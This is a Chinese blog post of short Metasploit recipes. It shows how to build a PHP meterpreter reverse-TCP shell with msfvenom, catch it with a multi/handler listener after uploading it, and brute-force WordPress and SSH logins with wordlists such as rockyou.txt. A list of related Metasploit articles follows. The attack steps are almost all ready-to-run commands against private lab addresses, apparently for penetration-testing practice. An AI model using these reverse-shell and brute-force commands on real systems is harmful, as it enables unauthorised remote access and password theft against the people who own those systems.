metasploit framework

最新推荐文章于 2023-04-27 20:28:37 发布
最新推荐文章于 2023-04-27 20:28:37 发布
阅读量687 收藏
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vhkjhwbs/article/details/102395047
版权

1,制作一个反弹shell,来执行服务的命令,并监听

(能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的)

(制作python型的只需要把php改为python就可以了)

msfvenom  -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw

-p 指定使用模块 -f raw  显示源代码

使用msfconsole监听

msfconsole
use exploit/multi/handler                     //使用 这个攻击模块
set payload php/meterpreter/reverse_tcp      //设置payload
show options
set lhost 192.168.11.165
run

然后上传并执行 反弹shell代码

在监听端就会显示相应内容

2,暴力破解wordpress的password

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set username admin
set pass_file /usr/share/wordlists/dirb/comment.txt
set targeturl /secret/
set rhost 192.168.11.170
run

其中如果不知道 username 可以用 wpscan 先进行暴力破解 username

3,暴力破解ssh的登录密码

msfconsole
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.106

set username hadi

set pass_file /usr/share/wordlists/rockyou.txt    //设置字典

set thread 10

show options

run

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Captain Hammer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit [基础]
煮酒闲谈
09-21 923
摘要Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。 【https://www.metasploit.com/】 这些功能包括: 智能开发 代码审计 Web应用程序扫描 社会工程 团队合作 简介Wiki-Metasploit:>>>Metasploi
MSF 详解
m0_72125469的博客
05-19 4464
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4735
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 9万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
Metasploit基础和命令的使用
w1304099880的博客
03-19 1311
Metasploit基础Metasploit是什么?渗透测试是干什么的?Metasploit基础命令 Metasploit是什么? Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
metasploit-framework-6.3.34.zip
最新发布
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会...
在Windows上安装Metasploit Framework 3.7.1出现问题及解决方法
03-25
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
Metasploit各版本对比
dcx3291777的博客
08-31 555
功能特性 描述 MetasploitFramework MetasploitCommunity MetasploitExpress Metasploit Pro Pricing License 无IP限制 Free Free ...
Metasploit 介绍
Sylon的博客
06-24 2429
Metasploit介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Metasploit简称msf 2....
kali 2020-1-20升级metasploit-framework
leoriclee的博客
04-25 564
kali2020-01-20用了也有一段时间了,今天学习python要用到msf,心血来潮想升级一下metasploit-framework,说(忘)干(记)就(镜)干(像) apt-get install metasploit-framework msf升级很顺利,结果再查看版本时报错,WTF 不想重新复制备份的VM,所以只好硬头皮修复问题,于是就有了这篇作品 首先 根据报错提示,执行bundle install,咣当,又报错了 然后 好吧,不能用root,那就用小kali吧,再报错找不到Gemfil
metasploit
tlucky的博客
07-03 2585
metasploit是一个安全框架,为渗透测试工程提供大量的渗透测试模块和扫描模块。被称为最流行的渗透测试工具之一。它提供了大量的渗透测试,攻击载荷,攻击技术以及后渗透模块
kali更新msf(metasploit framework
weixin_46119529的博客
10-03 1933
apt-get update apt-get install metasploit-framework apt-get update && apt-get upgrade && apt-get dist-upgrade apt-get clean reboot
Metasploit framework(一)——简单介绍其来源及历史
Jeromeyoung
03-24 1166
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻...
Metasploit Framework的使用说明
我喜欢某某某的专栏
07-22 3598
 Metasploit Framework 下载地址:http://metasploit.com/命令行下使用Metasploit运行后首先看到的是Metasploit欢迎界面,我们输入“?”得到在线帮助(如图1所示):图1可以看到里面有很多的命令,下面我将最重要的几个做简单解释:    “?”:得到帮助。    “cd”:更换当前的工作目录。    “exit”:退出。 
Metasploit用法大全
weixin_30807779的博客
01-24 798
Metasploit用户接口msfconsoleArmitage: KaliGUI启动;armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的Microso...
kali下的Metasploit升级更新至5.0.62
zb0567的专栏
06-15 3184
apt-get remove metasploit-framework apt-get install metasploit-framework 但是会出现各种问题 重装失败,显示找不到需要的软件,更换source源后重新安装。 vim /etc/apt/sources.list 添加这两行(任选) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.u

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值